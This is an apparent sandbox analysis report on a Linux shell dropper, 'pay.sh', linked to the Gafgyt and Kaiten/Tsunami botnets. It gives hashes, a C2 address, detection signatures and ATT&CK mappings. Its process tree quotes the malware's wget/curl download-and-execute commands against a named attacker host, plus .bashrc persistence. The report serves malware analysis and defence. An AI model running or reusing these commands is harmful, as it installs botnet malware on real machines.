Analysis
- max time kernel: 64s
- max time network: 69s
- platform: debian-9_mips
- resource: debian9-mipsbe-20240611-en
- resource tags: arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
- submitted: 22-10-2024 16:06
Static task: static1
Behavioral task: behavioral1
- Sample: pay.sh
- Resource: ubuntu1804-amd64-20240729-en
Behavioral task: behavioral2
- Sample: pay.sh
- Resource: debian9-armhf-20240611-en
Behavioral task: behavioral3
- Sample: pay.sh
- Resource: debian9-mipsbe-20240611-en
Behavioral task: behavioral4
- Sample: pay.sh
- Resource: debian9-mipsel-20240729-en
General
- Target: pay.sh
- Size: 3KB
- MD5: cf70ee36f1e9247f2146e4981924d4f4
- SHA1: 7eabae4200118c4e89979658db6e4d905fe3dae9
- SHA256: 0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c
- SHA512: 60f6bdf8813ee328f747b722e8d8abb8ecd91836a96de7e877217c6794d4dcef56130f3f833f748637b0a7b81bac94ea7e3d9cb3dfff0a2060eab34c20070bd0
Malware Config
Extracted: gafgyt
- 104.234.24.138:1990
Signatures
- Detected Gafgyt variant (1 IoC)
  resource: behavioral3/files/fstream-5.dat, yara_rule: family_gafgyt
- Detects Kaiten/Tsunami Payload (2 IoCs)
  resource: behavioral3/files/fstream-1.dat, yara_rule: family_kaiten2
  resource: behavioral3/files/fstream-3.dat, yara_rule: family_kaiten2
- Detects Kaiten/Tsunami payload (2 IoCs)
  resource: behavioral3/files/fstream-1.dat, yara_rule: family_kaiten
  resource: behavioral3/files/fstream-3.dat, yara_rule: family_kaiten
- File and Directory Permissions Modification (1 TTP, 4 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid 806 (chmod), pid 733 (chmod), pid 759 (chmod), pid 792 (chmod)
- Executes dropped EXE (4 IoCs)
  ioc /tmp/m3cr0, pid 734, process m3cr0
  ioc /tmp/zigaarch64, pid 761, process zigaarch64
  ioc /tmp/x00x, pid 793, process x00x
  ioc /tmp/m3cr0, pid 807, process m3cr0
- Creates/modifies environment variables (1 TTP, 1 IoC)
  Creating/modifying environment variables is a common persistence mechanism.
  File opened for modification: /root/.bashrc (process pay.sh)
- Modifies Bash startup script (2 TTPs, 1 IoC)
  File opened for modification: /root/.bashrc (process pay.sh)
- Reads runtime system information (5 IoCs)
  File opened for reading: /proc/sys/crypto/fips_enabled (process curl), 5 occurrences
- Writes file to tmp directory (10 IoCs)
  Malware often drops required files in the /tmp directory.
  File opened for modification: /tmp/zigaarch64 (process wget)
  File opened for modification: /tmp/zigaarch64 (process curl)
  File opened for modification: /tmp/x00x (process curl)
  File opened for modification: /tmp/bash.sh (process wget)
  File opened for modification: /tmp/bash.sh (process curl)
  File opened for modification: /tmp/m3cr0 (process wget)
  File opened for modification: /tmp/m3cr0 (process curl)
  File opened for modification: /tmp/x00x (process wget)
  File opened for modification: /tmp/m3cr0 (process curl)
  File opened for modification: /tmp/m3cr0 (process wget)
Processes
[PID 698] /tmp/pay.sh: /tmp/pay.sh
- Creates/modifies environment variables
- Modifies Bash startup script
    [PID 702] /usr/bin/wget: wget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0
    - Writes file to tmp directory
    [PID 726] /usr/bin/curl: curl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0
    - Reads runtime system information
    - Writes file to tmp directory
    [PID 733] /bin/chmod: chmod +x m3cr0
    - File and Directory Permissions Modification
    [PID 734] /tmp/m3cr0: ./m3cr0
    - Executes dropped EXE
    [PID 737] /bin/rm: rm -rf m3cr0
    [PID 739] /bin/rm: rm -rf m3cr0.1
    [PID 740] /usr/bin/wget: wget http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -O zigaarch64
    - Writes file to tmp directory
    [PID 750] /usr/bin/curl: curl http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -o zigaarch64
    - Reads runtime system information
    - Writes file to tmp directory
    [PID 759] /bin/chmod: chmod +x zigaarch64
    - File and Directory Permissions Modification
    [PID 761] /tmp/zigaarch64: ./zigaarch64
    - Executes dropped EXE
    [PID 763] /bin/rm: rm -rf zigaarch64
    [PID 765] /bin/rm: rm -rf zigaarch64.1
    [PID 766] /usr/bin/wget: wget -q http://floodernetwork111.accesscam.org:8089/b/x00x -O x00x
    - Writes file to tmp directory
    [PID 778] /usr/bin/curl: curl -s http://floodernetwork111.accesscam.org:8089/b/x00x -o x00x
    - Reads runtime system information
    - Writes file to tmp directory
    [PID 792] /bin/chmod: chmod +x x00x
    - File and Directory Permissions Modification
    [PID 793] /tmp/x00x: ./x00x
    - Executes dropped EXE
    [PID 795] /bin/rm: rm -rf x00x
    [PID 796] /bin/rm: rm -rf x00x.1
    [PID 797] /usr/bin/wget: wget http://floodernetwork111.accesscam.org:8089/bash.sh
    - Writes file to tmp directory
    [PID 799] /usr/bin/curl: curl -O http://floodernetwork111.accesscam.org:8089/bash.sh
    - Reads runtime system information
    - Writes file to tmp directory
    [PID 802] /bin/rm: rm -rf bash.sh.1
    [PID 801] /bin/bash: bash bash.sh
        [PID 803] /usr/bin/wget: wget -q http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0
        - Writes file to tmp directory
        [PID 804] /usr/bin/curl: curl -s http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0
        - Reads runtime system information
        - Writes file to tmp directory
        [PID 806] /bin/chmod: chmod +x m3cr0
        - File and Directory Permissions Modification
        [PID 807] /tmp/m3cr0: ./m3cr0
        - Executes dropped EXE
        [PID 809] /bin/rm: rm -rf m3cr0
        [PID 810] /bin/rm: rm -rf m3cr0.1
        [PID 811] /bin/sleep: sleep 6000
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
- Event Triggered Execution (1)
- Unix Shell Configuration Modification (1)
- Hijack Execution Flow (1)
- Path Interception by PATH Environment Variable (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
- Event Triggered Execution (1)
- Unix Shell Configuration Modification (1)
- Hijack Execution Flow (1)
- Path Interception by PATH Environment Variable (1)
Downloads
- 4 dropped files (sizes 236B, 983KB, 985KB, 73KB)